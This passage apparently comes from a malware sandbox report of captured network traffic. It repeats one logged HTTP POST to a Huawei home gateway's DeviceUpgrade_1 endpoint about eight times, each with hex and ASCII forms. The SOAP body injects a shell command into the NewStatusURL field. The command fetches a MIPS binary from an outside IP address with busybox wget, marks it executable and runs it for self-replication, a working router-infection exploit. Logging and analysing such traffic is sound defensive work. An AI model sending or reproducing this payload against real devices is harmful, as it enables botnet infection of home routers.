2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
